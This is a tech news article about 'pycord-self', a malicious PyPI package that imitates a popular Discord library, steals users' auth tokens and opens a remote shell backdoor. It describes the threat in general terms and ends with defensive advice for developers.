Category: IT|Jan 18, 2025 | Author: Admin

Malicious PyPi package steals Discord auth tokens from devs

Share on

A malicious package named 'pycord-self' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system.

Malicious PyPi package steals Discord auth tokens from devs

The package mimics the highly popular 'discord.py-self,' which has nearly 28 million downloads, and even offers the functionality of the legitimate project.

 

The official package is a Python library that allows communication with Discord's user API and permits developers to control accounts programmatically.

 

It is typically used for messaging and automating interactions, creating of Discord bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.

 

According to code security company Socket, the malicious package was added to PyPi last year in June and has been downloaded 885 times so far.

 

At the time of writing, the package is still available on PyPI from a publisher that had its details verified by the platform.

 

Token theft and persistent access


Socket researchers analyzed the malicious package and found that pycord-self contains code that performs two main things. One is stealing Discord authentication tokens from the victim and sending them to an external URL.

 

Attackers can use the stolen token to hijack the developer's Discord account without needing the access credentials, even if two-factor authentication protection is active.

 

The second function of the malicious package is to set up a stealthy backdoor mechanism by creating a persistent connection to a remote server through port 6969.

 

"Depending on the operating system, it launches a shell ("bash" on Linux or "cmd" on Windows) that grants the attacker continuous access to the victim's system," explains Socket in the report.

 

"The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional."

 

Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially if it's a popular one. Verifying the name of the package can also lower the risk of falling victim of typosquatting.

 

When working with open-source libraries, it is advisable to review the code for suspicious functions, if possible, and avoid anything that appears obfuscated. Additionally, scanning tools may help with detecting and blocking malicious packages.

Sponsored Ads:

Comments:


windows-blue-background-06-02-25.png

New Microsoft script updates Windows media with bootkit malware fixes

Category: Microsoft|Feb 6, 2025 | Author: Admin
Microsoft_Office-05-02-25.png

This Microsoft Office Standalone license deal comes with AI improvements

Category: Microsoft|Feb 5, 2025 | Author: Admin
7-zip-red-bright-04-02-25.png

7-Zip MotW bypass exploited in zero-day attacks against Ukraine

Category: IT|Feb 4, 2025 | Author: Admin
Microsoft_Defender-03-02-25.jpg

Microsoft kills off Defender 'Privacy Protection' VPN feature

Category: Microsoft|Feb 3, 2025 | Author: Admin
back-pypi-02-02-25.png

PyPI adds project archiving system to stop malicious updates

Category: IT|Feb 2, 2025 | Author: Admin
ai-cybersecurity-hacker-01-02-25.png

Google says hackers abuse Gemini AI to empower their attacks

Category: IT|Feb 1, 2025 | Author: Admin
Chromium-headpic-31-01-25.png

Microsoft improves text contrast for all Windows Chromium browsers

Category: Microsoft|Jan 31, 2025 | Author: Admin
Google_Chrome-30-01-25.png

New Syncjacking attack hijacks devices using Chrome extensions

Category: Google|Jan 30, 2025 | Author: Admin
Google-Chrome-29-01-25.png

Google to kill Chrome Sync on older Chrome browser versions

Category: Google|Jan 29, 2025 | Author: Admin
Microsoft-28-01-25.png

Microsoft gives OpenAI some breathing room

Category: Microsoft|Jan 28, 2025 | Author: Admin
Windows-11-27-01-25.png

Windows 11 24H2 preview brings new taskbar features

Category: Microsoft|Jan 27, 2025 | Author: Admin
paypal-26-01-25.png

PayPal to pay $2 million settlement over 2022 data breach

Category: IT|Jan 26, 2025 | Author: Admin
zyxel-25-01-25.png

Zyxel warns of bad signature update causing firewall boot loops

Category: IT|Jan 25, 2025 | Author: Admin
windows-blue-background-24-01-25.png

Microsoft to deprecate WSUS driver synchronization in 90 days

Category: Microsoft|Jan 24, 2025 | Author: Admin
Pwn2Own_Tokyo_headpic-23-01-25.png

Tesla EV charger hacked twice on second day of Pwn2Own Tokyo

Category: IT|Jan 23, 2025 | Author: Admin
more